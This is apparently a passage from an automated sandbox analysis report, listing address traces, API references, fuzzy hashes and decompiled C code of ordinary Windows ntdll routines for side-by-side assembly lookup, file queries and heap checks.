                                                                                                                            0x6b1d52d9
                                                                                                                            0x6b1d52dd
                                                                                                                            0x6b1d52e7
                                                                                                                            0x6b1d52f7
                                                                                                                            0x6b1d52f9
                                                                                                                            0x6b1d52fd
                                                                                                                            0x6b230dcf
                                                                                                                            0x6b230dd5
                                                                                                                            0x6b230dd6
                                                                                                                            0x6b230dd7
                                                                                                                            0x6b230dd8
                                                                                                                            0x6b230dd9
                                                                                                                            0x6b230dde
                                                                                                                            0x6b230ddf
                                                                                                                            0x6b230de0
                                                                                                                            0x6b230de1
                                                                                                                            0x6b230de2
                                                                                                                            0x6b230de5
                                                                                                                            0x6b230dea
                                                                                                                            0x6b230dec
                                                                                                                            0x6b230f60
                                                                                                                            0x6b230f64
                                                                                                                            0x6b230f70
                                                                                                                            0x6b230f76
                                                                                                                            0x6b230f79
                                                                                                                            0x6b230f79
                                                                                                                            0x00000000
                                                                                                                            0x6b230f64
                                                                                                                            0x6b230df2
                                                                                                                            0x6b230df7
                                                                                                                            0x6b230e04
                                                                                                                            0x6b230e0d
                                                                                                                            0x6b230e10
                                                                                                                            0x6b230e1a
                                                                                                                            0x6b230e1c
                                                                                                                            0x6b230e4c
                                                                                                                            0x6b230e52
                                                                                                                            0x6b230e61
                                                                                                                            0x6b230e67
                                                                                                                            0x6b230e6b
                                                                                                                            0x6b230e70
                                                                                                                            0x6b230e76
                                                                                                                            0x6b230ed7
                                                                                                                            0x6b230edc
                                                                                                                            0x6b230ee0
                                                                                                                            0x6b230eea
                                                                                                                            0x6b230ef0
                                                                                                                            0x6b230ef6
                                                                                                                            0x6b230ef9
                                                                                                                            0x6b230efe
                                                                                                                            0x6b230f01
                                                                                                                            0x6b230f01
                                                                                                                            0x6b230f0b
                                                                                                                            0x6b230f12
                                                                                                                            0x6b230f16
                                                                                                                            0x6b230f18
                                                                                                                            0x6b230f1b
                                                                                                                            0x6b230f2c
                                                                                                                            0x6b230f31
                                                                                                                            0x6b230f31
                                                                                                                            0x6b230f35
                                                                                                                            0x6b230f39
                                                                                                                            0x6b230f3a
                                                                                                                            0x6b230f3c
                                                                                                                            0x6b230f3f
                                                                                                                            0x6b230f50
                                                                                                                            0x6b230f55
                                                                                                                            0x6b230f55
                                                                                                                            0x6b230f59
                                                                                                                            0x6b1d52eb
                                                                                                                            0x6b1d52f1
                                                                                                                            0x6b1d52f1
                                                                                                                            0x6b230e7d
                                                                                                                            0x6b230e84
                                                                                                                            0x6b230e88
                                                                                                                            0x6b230e8a
                                                                                                                            0x6b230e8d
                                                                                                                            0x6b230e9e
                                                                                                                            0x6b230ea3
                                                                                                                            0x6b230ea3
                                                                                                                            0x6b230ea7
                                                                                                                            0x6b230eaf
                                                                                                                            0x6b230eb3
                                                                                                                            0x6b230eb9
                                                                                                                            0x6b230ebc
                                                                                                                            0x6b230ecd
                                                                                                                            0x6b230ecd
                                                                                                                            0x00000000
                                                                                                                            0x6b230eb3
                                                                                                                            0x6b230e21
                                                                                                                            0x6b230e2b
                                                                                                                            0x6b230e2f
                                                                                                                            0x6b230e30
                                                                                                                            0x6b230e3a
                                                                                                                            0x6b230e3f
                                                                                                                            0x6b230e41
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b230e47
                                                                                                                            0x00000000
                                                                                                                            0x6b230e47
                                                                                                                            0x6b230df9
                                                                                                                            0x6b230dfe
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b230dfe
                                                                                                                            0x6b1d5303
                                                                                                                            0x6b1d5307
                                                                                                                            0x00000000
                                                                                                                            0x6b1d5309
                                                                                                                            0x00000000
                                                                                                                            0x6b1d5309
                                                                                                                            0x6b1d5307
                                                                                                                            0x6b1d52e9
                                                                                                                            0x6b1d52e9
                                                                                                                            0x00000000
                                                                                                                            0x6b1d52e9
                                                                                                                            0x6b1d530e
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.1105(6B2C79A0,?,00000000,?), ref: 6B1D52BF
                                                                                                                            • RtlLeaveCriticalSection.1105(6B2C79A0,6B2C79A0,?,00000000,?), ref: 6B1D52DD
                                                                                                                            • ZwFsControlFile.1105(?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,6B2C79A0,6B2C79A0,?,00000000,?), ref: 6B230DE5
                                                                                                                            • RtlEnterCriticalSection.1105(6B2C79A0,6B2C79A0,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,6B2C79A0,6B2C79A0,?,00000000), ref: 6B230E6B
                                                                                                                            • RtlLeaveCriticalSection.1105(6B2C79A0,6B2C79A0,6B2C79A0,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,6B2C79A0,6B2C79A0,?), ref: 6B230E7D
                                                                                                                            • ZwClose.1105(?,6B2C79A0,6B2C79A0,6B2C79A0,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,6B2C79A0,6B2C79A0), ref: 6B230E8D
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,?,6B2C79A0,6B2C79A0,6B2C79A0,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000), ref: 6B230E9E
                                                                                                                            • ZwClose.1105(?,6B2C79A0,6B2C79A0,6B2C79A0,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,6B2C79A0,6B2C79A0), ref: 6B230EBC
                                                                                                                            • RtlFreeHeap.1105(?,00000000,6B2C79A0,?,6B2C79A0,6B2C79A0,6B2C79A0,?,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000), ref: 6B230ECD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$CloseEnterFreeHeapLeave$ControlFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1928194833-0
                                                                                                                            • Opcode ID: 620a364dffc07a1ba370b7fac9914f650bafe8e631b245ae9a839552a5442273
                                                                                                                            • Instruction ID: c470adae4b43b3246548b386b86903993792a669cc507487102c0484a286df0f
                                                                                                                            • Opcode Fuzzy Hash: 620a364dffc07a1ba370b7fac9914f650bafe8e631b245ae9a839552a5442273
                                                                                                                            • Instruction Fuzzy Hash: 7251FD7114974AEFC311CF28C885B17BBE4FF50714F100A2EE59487691EB38E846CBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B265F5F, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 161memorynativefileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 51%
                                                                                                                            			E6B265F5F(WCHAR* __ecx, intOrPtr __edx, void** _a4) {
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				void* _v40;
				char _v44;
				char _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				void* _v76;
				char _v84;
				WCHAR* _v88;
				intOrPtr _v100;
				signed int _t48;
				signed int _t54;
				int _t64;
				intOrPtr _t82;
				void* _t85;
				void* _t87;
				void* _t91;
				void* _t96;
				void* _t97;
				signed int _t100;

				_v76 = _v76 & 0x00000000;
				_t85 = 0;
				_v72 = __edx;
				if(__ecx == 0 || __edx == 0 || _a4 == 0) {
					_t48 = 0xc000000d;
					goto L26;
				} else {
					if( *__ecx == 0x5c) {
						RtlInitUnicodeString( &_v68, __ecx);
						L8:
						_v32 = _v32 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_push(0x4021);
						_v28 =  &_v76;
						_push(7);
						_push( &_v60);
						_v36 = 0x18;
						_push( &_v36);
						_push(0x100001);
						_v24 = 0x40;
						_push( &_v84);
						_t54 = E6B219830();
						_t100 = _t54;
						if(_t85 == 0) {
							L13:
							if(_t100 >= 0) {
								_t96 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 8, 0x410);
								if(_t96 != 0) {
									RtlInitUnicodeString( &_v76, _v88);
									_push(0);
									_push( &_v84);
									_push(1);
									_push(3);
									_push(0x410);
									_push(_t96);
									_push( &_v76);
									_push(0);
									_push(0);
									_push(0);
									_push(_v100);
									_t100 = E6B219850();
									if(_t100 >= 0) {
										_t64 =  *(_t96 + 0x3c);
										if(_t64 <= 0x104) {
											_t87 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 8, _t64 + 4);
											if(_t87 != 0) {
												_t39 = _t96 + 0x5e; // 0x5e
												memcpy(_t87, _t39,  *(_t96 + 0x3c));
												 *((short*)(_t87 + ( *(_t96 + 0x3c) >> 1) * 2)) = 0;
												 *_a4 = _t87;
											} else {
												_t100 = 0xc0000017;
											}
										}
									}
									RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t96);
								} else {
									_t100 = 0xc0000017;
								}
							}
							L22:
							if(_v84 != 0) {
								_push(_v84);
								E6B2195D0();
							}
							_t48 = _t100;
							L26:
							return _t48;
						}
						_t97 = _v40;
						if(_t97 != 0) {
							asm("lock xadd [edi], eax");
							if((_t54 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t97 + 4)));
								E6B2195D0();
								RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t97);
							}
						}
						RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t85);
						goto L13;
					}
					_push( &_v44);
					_push(0);
					_push( &_v68);
					_t91 = 2;
					_t100 = E6B1E65BA(_t91, __ecx);
					if(_t100 < 0) {
						goto L22;
					} else {
						_t82 = _v44;
						_t85 = _v64;
						if(_t82 != 0) {
							_v68 = _t82;
							_v64 = _v40;
						}
						goto L8;
					}
				}
			}





























                                                                                                                            0x6b265f6a
                                                                                                                            0x6b265f73
                                                                                                                            0x6b265f75
                                                                                                                            0x6b265f7c
                                                                                                                            0x6b266137
                                                                                                                            0x00000000
                                                                                                                            0x6b265f93
                                                                                                                            0x6b265f97
                                                                                                                            0x6b265fd9
                                                                                                                            0x6b265fde
                                                                                                                            0x6b265fde
                                                                                                                            0x6b265fe7
                                                                                                                            0x6b265fec
                                                                                                                            0x6b265ff1
                                                                                                                            0x6b265ff6
                                                                                                                            0x6b265ffe
                                                                                                                            0x6b266000
                                                                                                                            0x6b266005
                                                                                                                            0x6b26600d
                                                                                                                            0x6b26600e
                                                                                                                            0x6b266017
                                                                                                                            0x6b26601f
                                                                                                                            0x6b266020
                                                                                                                            0x6b266025
                                                                                                                            0x6b266029
                                                                                                                            0x6b266066
                                                                                                                            0x6b266068
                                                                                                                            0x6b266084
                                                                                                                            0x6b266088
                                                                                                                            0x6b26609d
                                                                                                                            0x6b2660a8
                                                                                                                            0x6b2660a9
                                                                                                                            0x6b2660aa
                                                                                                                            0x6b2660ac
                                                                                                                            0x6b2660ae
                                                                                                                            0x6b2660af
                                                                                                                            0x6b2660b4
                                                                                                                            0x6b2660b5
                                                                                                                            0x6b2660b6
                                                                                                                            0x6b2660b7
                                                                                                                            0x6b2660b8
                                                                                                                            0x6b2660c1
                                                                                                                            0x6b2660c5
                                                                                                                            0x6b2660c7
                                                                                                                            0x6b2660cf
                                                                                                                            0x6b2660e5
                                                                                                                            0x6b2660e9
                                                                                                                            0x6b2660f5
                                                                                                                            0x6b2660fa
                                                                                                                            0x6b266109
                                                                                                                            0x6b266110
                                                                                                                            0x6b2660eb
                                                                                                                            0x6b2660eb
                                                                                                                            0x6b2660eb
                                                                                                                            0x6b2660e9
                                                                                                                            0x6b2660cf
                                                                                                                            0x6b26611e
                                                                                                                            0x6b26608a
                                                                                                                            0x6b26608a
                                                                                                                            0x6b26608a
                                                                                                                            0x6b266088
                                                                                                                            0x6b266123
                                                                                                                            0x6b266128
                                                                                                                            0x6b26612a
                                                                                                                            0x6b26612e
                                                                                                                            0x6b26612e
                                                                                                                            0x6b266133
                                                                                                                            0x6b26613c
                                                                                                                            0x6b266142
                                                                                                                            0x6b266142
                                                                                                                            0x6b26602b
                                                                                                                            0x6b266031
                                                                                                                            0x6b266036
                                                                                                                            0x6b26603a
                                                                                                                            0x6b26603c
                                                                                                                            0x6b26603f
                                                                                                                            0x6b266050
                                                                                                                            0x6b266050
                                                                                                                            0x6b26603a
                                                                                                                            0x6b266061
                                                                                                                            0x00000000
                                                                                                                            0x6b266061
                                                                                                                            0x6b265f9f
                                                                                                                            0x6b265fa0
                                                                                                                            0x6b265fa5
                                                                                                                            0x6b265fa8
                                                                                                                            0x6b265fae
                                                                                                                            0x6b265fb2
                                                                                                                            0x00000000
                                                                                                                            0x6b265fb8
                                                                                                                            0x6b265fb8
                                                                                                                            0x6b265fbc
                                                                                                                            0x6b265fc3
                                                                                                                            0x6b265fc5
                                                                                                                            0x6b265fcd
                                                                                                                            0x6b265fcd
                                                                                                                            0x00000000
                                                                                                                            0x6b265fc3
                                                                                                                            0x6b265fb2

                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 6B265FD9
                                                                                                                            • ZwOpenFile.1105(?,00100001,?,?,00000007,00004021), ref: 6B266020
                                                                                                                            • ZwClose.1105(00000000,?,00100001,?,?,00000007,00004021), ref: 6B26603F
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,00000000,?,00100001,?,?,00000007,00004021), ref: 6B266050
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?,00100001,?,?,00000007,00004021), ref: 6B266061
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,00000410,?,00100001,?,?,00000007,00004021), ref: 6B26607F
                                                                                                                            • ZwClose.1105(00000000,?,00100001,?,?,00000007,00004021), ref: 6B26612E
                                                                                                                              • Part of subcall function 6B1E65BA: RtlInitUnicodeStringEx.1105(?,?,?), ref: 6B1E65CA
                                                                                                                            • RtlInitUnicodeString.1105(?,?,00000008,00000410,?,00100001,?,?,00000007,00004021), ref: 6B26609D
                                                                                                                            • ZwQueryDirectoryFile.1105(?,00000000,00000000,00000000,?,00000000,00000410,00000003,00000001,?,00000000,?,?,00000008,00000410,?), ref: 6B2660BC
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,?,?,00000000,00000000,00000000,?,00000000,00000410,00000003,00000001,?,00000000,?,?), ref: 6B2660E0
                                                                                                                            • memcpy.1105(00000000,0000005E,?,00000008,?,?,00000000,00000000,00000000,?,00000000,00000410,00000003,00000001,?,00000000), ref: 6B2660FA
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000410,00000003,00000001,?,00000000,?,?), ref: 6B26611E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$FreeInitStringUnicode$AllocateCloseFile$DirectoryOpenQuerymemcpy
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1610808139-2766056989
                                                                                                                            • Opcode ID: f01aa9c5d7505036a5332c028e8c9018f26f72483e3ba049823e414153cadd42
                                                                                                                            • Instruction ID: a75a4a6bb83f164662b5b041c6efdc414bb0a148d46061bcc2dc9155df10aaab
                                                                                                                            • Opcode Fuzzy Hash: f01aa9c5d7505036a5332c028e8c9018f26f72483e3ba049823e414153cadd42
                                                                                                                            • Instruction Fuzzy Hash: 5651EC7250874AAFD712CF24C9C1F9BB7E8FB84794F000969BA4097291E7B8ED45CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B264A28, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 126nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwOpenKey.1105(?,00000001,00000018,00000000,?,?), ref: 6B264AB1
                                                                                                                              • Part of subcall function 6B219600: LdrInitializeThunk.NTDLL(6B211119,?,?,00000018,?), ref: 6B21960A
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: Unabel to query location from storage root subkey %wZ; Status = 0x%08lx,?,00000000,?,6B1B1B28,00000002,?,00000218,?,?,00000001,00000018,00000000,?), ref: 6B264ACC
                                                                                                                            • ZwQueryValueKey.1105(?,6B1B1B28,00000002,?,00000218,?,?,00000001,00000018,00000000,?,?), ref: 6B264AF9
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: Assembly storage root location value has non-even size,?,6B1B1B28,00000002,?,00000218,?,?,00000001,00000018,00000000,?,?), ref: 6B264B24
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: Assembly storage root location for %wZ does not fit in a UNICODE STRING,?,?,6B1B1B28,00000002,?,00000218,?,?,00000001,00000018,00000000,?,?), ref: 6B264B67
                                                                                                                            • memcpy.1105(00000010,?,?,?,6B1B1B28,00000002,?,00000218,?,?,00000001,00000018,00000000,?,?), ref: 6B264BA2
                                                                                                                            • ZwClose.1105(?,00000000,?,?), ref: 6B264BCB
                                                                                                                            Strings
                                                                                                                            • @, xrefs: 6B264A9B
                                                                                                                            • SXS: Assembly storage root location for %wZ does not fit in a UNICODE STRING, xrefs: 6B264B5F
                                                                                                                            • SXS: Assembly storage root location value type is not REG_SZ, xrefs: 6B264B1C
                                                                                                                            • SXS: Unable to open storage root subkey %wZ; Status = 0x%08lx, xrefs: 6B264AC4
                                                                                                                            • SXS: Assembly storage root location value has non-even size, xrefs: 6B264B41
                                                                                                                            • SXS: Unabel to query location from storage root subkey %wZ; Status = 0x%08lx, xrefs: 6B264B0C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print$CloseInitializeOpenQueryThunkValuememcpy
                                                                                                                            • String ID: @$SXS: Assembly storage root location for %wZ does not fit in a UNICODE STRING$SXS: Assembly storage root location value has non-even size$SXS: Assembly storage root location value type is not REG_SZ$SXS: Unabel to query location from storage root subkey %wZ; Status = 0x%08lx$SXS: Unable to open storage root subkey %wZ; Status = 0x%08lx
                                                                                                                            • API String ID: 248942162-306078230
                                                                                                                            • Opcode ID: 965b0992411fca26eef8a6ea1073d8276bbd2158013114381d85f6c607190bd3
                                                                                                                            • Instruction ID: e6e7eadcb700b9d9baea7a447bae728a23e10f1b26c5d6eb6f28a40935787b96
                                                                                                                            • Opcode Fuzzy Hash: 965b0992411fca26eef8a6ea1073d8276bbd2158013114381d85f6c607190bd3
                                                                                                                            • Instruction Fuzzy Hash: 35419471D4112DBBD7208A55DCE9BAAB2F8AF04384F0001EAE958A7240E73C9ED4CF91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2949A4, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 114memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwAllocateVirtualMemory.1105(000000FF,?,00000000,?,00001000,00000004,00000000,?,00000000,?,?,6B2944B7,?), ref: 6B2949DF
                                                                                                                              • Part of subcall function 6B219660: LdrInitializeThunk.NTDLL(6B2618BF,000000FF,00000000,00000000,0000000C,00001000,00000004,6B2B0810,0000001C,6B261616), ref: 6B21966A
                                                                                                                            • RtlCompareMemory.1105(?,01000000,?,00000000,?,00000000,?,?,6B2944B7,?), ref: 6B2949FE
                                                                                                                            • memcpy.1105(01000000,?,?,00000000,?,00000000,?,?,6B2944B7,?), ref: 6B294A0C
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?), ref: 6B294A42
                                                                                                                            • DbgPrint.1105(HEAP: ,?), ref: 6B294A4F
                                                                                                                            • DbgPrint.1105(Heap %p - headers modified (%p is %lx instead of %lx),?,HEAP: ,HEAP: ,00000000,?), ref: 6B294A66
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?), ref: 6B294ABC
                                                                                                                            • DbgPrint.1105(HEAP: ,?,?,?,?,?,?), ref: 6B294AC9
                                                                                                                            • DbgPrint.1105( This is located in the %s field of the heap header.,?,?,?,?,?,?), ref: 6B294ADB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print$Memory$AllocateCompareInitializeThunkVirtualmemcpy
                                                                                                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                            • API String ID: 4107597528-336120773
                                                                                                                            • Opcode ID: 1f6452e732cc0cd60103826185e97ffb5f39c39e48c62ec289d81d615b1cbcaa
                                                                                                                            • Instruction ID: b159bc4754b5d8bfb8eea3847315ebbc0d3d987b805762c0c9107cfcf01c4907
                                                                                                                            • Opcode Fuzzy Hash: 1f6452e732cc0cd60103826185e97ffb5f39c39e48c62ec289d81d615b1cbcaa
                                                                                                                            • Instruction Fuzzy Hash: 23310231110119FFD724EB6BE8D9F9773E8EB05B25F154195F439CB290E738A840C665
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1F3360, Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 355COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E6B1F3360(signed short* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr* _a8, unsigned int _a12, void* _a16) {
				signed int _v8;
				void _v32;
				char _v33;
				void* _v40;
				signed short* _v44;
				struct _EXCEPTION_RECORD _v48;
				char _v52;
				intOrPtr _v56;
				short _v58;
				void* _v60;
				signed short _v64;
				unsigned int _v68;
				intOrPtr _v72;
				void* _v76;
				intOrPtr* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t144;
				short _t165;
				void _t171;
				signed int _t173;
				void* _t177;
				void _t178;
				short _t181;
				void _t187;
				signed short* _t193;
				signed int _t198;
				signed int _t199;
				void* _t200;
				signed int _t206;
				signed short _t207;
				signed short _t208;
				signed char _t220;
				char _t221;
				intOrPtr* _t223;
				signed int _t225;
				void* _t226;
				signed int _t228;
				unsigned int _t229;
				signed short* _t231;
				void* _t233;
				signed int _t235;
				signed int _t237;
				void* _t238;

				_v8 =  *0x6b2cd360 ^ _t237;
				_t193 = __ecx;
				_v48 = _a4;
				_t233 = _a16;
				_t229 = _a12;
				_v72 = __edx;
				_v44 = __ecx;
				_v80 = _a8;
				_v68 = _t229;
				_v40 = _t233;
				_v33 = 1;
				if((__ecx[8] & 0x00000001) == 0) {
					_t220 = 0;
				} else {
					_t220 = 1;
				}
				_v52 = _t220;
				if( *_t193 != 0x64487353) {
					L71:
					_t140 = 0xc0150003;
					goto L32;
				} else {
					if(_t193[0xa] == 0) {
						L31:
						_t140 = 0xc0150008;
						goto L32;
					} else {
						_t198 = _t193[0xe];
						if(_t198 == 0xffffffff) {
							_t221 = 0;
							goto L21;
						} else {
							if( *_t229 == _t198) {
								L20:
								_t221 = _v33;
								goto L21;
							} else {
								_t187 = 0;
								if(_v48 == 0 || _t233 == 0) {
									_t140 = 0xc000000d;
									goto L18;
								} else {
									_t231 = _v48;
									_t193 = _t231[2];
									 *_t233 = 0;
									_t229 = ( *_t231 & 0x0000ffff) >> 1;
									if(_t198 > 1) {
										L65:
										if(E6B1EFAB0(_t198, _v48, _v52, 0,  &_v76) < 0) {
											goto L32;
										} else {
											_t193 = _v44;
											E6B265720(0x33, 0, "RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.\n", _t193[0xe]);
											_t238 = _t238 + 0x10;
											_t221 = 0;
											L21:
											_v33 = _t221;
											if(_t193[4] != 1) {
												_t220 = 0;
											}
											_t199 = _t193[0x10];
											asm("sbb al, al");
											if((_t220 &  ~_t199) == 0) {
												if(_t220 == 0 || (_t193[8] & 0x00000002) == 0) {
													_t229 = _v44;
													_t193 = _t193[0xc] + _t229;
													_t233 =  *(_t229 + 0x14);
													if(_t233 != 0) {
														_t200 = _v40;
														do {
															_t144 = _t193[4];
															_v60 = _t144;
															_v58 = _t144;
															_v56 = _t193[2] + _t229;
															if(_t220 == 0 ||  *_t193 ==  *_t200) {
																if(RtlCompareUnicodeString(_v48,  &_v60, _v52) == 0) {
																	goto L52;
																} else {
																	_t220 = _v33;
																	_t200 = _v40;
																	goto L81;
																}
															} else {
																goto L81;
															}
															goto L83;
															L81:
															_t193 =  &(_t193[0xc]);
															_t233 = _t233 - 1;
														} while (_t233 != 0);
													}
													goto L31;
												} else {
													_t205 = _t193[0xa];
													_t233 = _t193 + _t193[0xc];
													_t65 = _t205 - 1; // -1
													_t229 = _t233 + (_t65 + _t65 * 2) * 8;
													_v32 =  *_v40;
													_t193 = bsearch( &_v32, _t233, _t193[0xa], 0x18, 0x6b208c30);
													if(_t193 == 0) {
														goto L31;
													} else {
														if(_t193 != _t233) {
															_t171 =  *_v40;
															while( *_t193 == _t171) {
																_t193 = _t193 - 0x18;
																if(_t193 != _t233) {
																	continue;
																}
																goto L42;
															}
														}
														L42:
														_t233 =  *_v40;
														if( *_t193 != _t233) {
															_t193 =  &(_t193[0xc]);
														}
														while(1) {
															_t165 = _t193[4];
															_v60 = _t165;
															_v58 = _t165;
															_v56 = _v44 + _t193[2];
															if(RtlCompareUnicodeString(_v48,  &_v60, _v52) == 0) {
																break;
															}
															_t193 =  &(_t193[0xc]);
															if(_t193 > _t229) {
																goto L31;
															} else {
																if( *_t193 == _t233) {
																	continue;
																} else {
																	break;
																}
															}
															goto L83;
														}
														if(_t193 > _t229) {
															goto L31;
														} else {
															if( *_t193 == _t233) {
																goto L51;
															} else {
																goto L31;
															}
														}
													}
												}
											} else {
												_t233 = _t193 + _t199;
												_t206 =  *_v40;
												_t173 = _t206;
												_v68 = _t206;
												if( *_t233 != 0xb) {
													_t225 = _t173 %  *_t233;
												} else {
													_t225 = _t173 % 0xb;
												}
												_t41 = _t233 + 4; // 0x1cc
												_t229 = 0;
												_v40 = _t225;
												_t226 =  *_t41 + _t225 * 8;
												_t220 = _t226 + _t193;
												_t177 =  *((intOrPtr*)(_t226 +  &(_t193[2]))) + _t193;
												_v64 = _t220;
												_v76 = _t177;
												if( *_t220 <= 0) {
													goto L31;
												} else {
													_t233 = _t177;
													while(1) {
														_t178 =  *_t233;
														if(_t178 > _v72) {
															break;
														}
														_t193 = _t193 + _t178;
														if(_v33 == 0 ||  *_t193 == _t206) {
															_t207 = _t193[2];
															if(_t207 > _v72) {
																_push(_v76);
																_push(_t220);
																_push(_v40);
																_push(_v44);
																_push(_t207);
																E6B265720(0x33, 0, "SXS: String hash table entry at %p has invalid key offset (= %ld)\n   Header = %p; Index = %lu; Bucket = %p; Chain = %p\n", _t193);
																_t140 = 0xc0150003;
																goto L32;
															} else {
																_t181 = _t193[4];
																_v60 = _t181;
																_v58 = _t181;
																_v56 = _v44 + _t207;
																if(RtlCompareUnicodeString(_v48,  &_v60, _v52) != 0) {
																	_t206 = _v68;
																	_t220 = _v64;
																	goto L30;
																} else {
																	L51:
																	_t229 = _v44;
																	L52:
																	if(_t193 == 0 || _t193[6] == 0) {
																		goto L31;
																	} else {
																		_t223 = _v80;
																		if(_t223 != 0) {
																			 *((intOrPtr*)(_t223 + 4)) =  *((intOrPtr*)(_t229 + 0xc));
																			 *((intOrPtr*)(_t223 + 8)) = _t193[6] + _t229;
																			 *(_t223 + 0xc) = _t193[8];
																			if(_t223 + 0x28 <=  *_t223 + _t223) {
																				 *(_t223 + 0x24) = _t193[0xa];
																			}
																		}
																		return E6B21B640(0, _t193, _v8 ^ _t237, _t223, _t229, _t233);
																	}
																}
															}
														} else {
															L30:
															_t193 = _v44;
															_t229 = _t229 + 1;
															_t233 = _t233 + 4;
															if(_t229 <  *_t220) {
																continue;
															} else {
																goto L31;
															}
														}
														goto L83;
													}
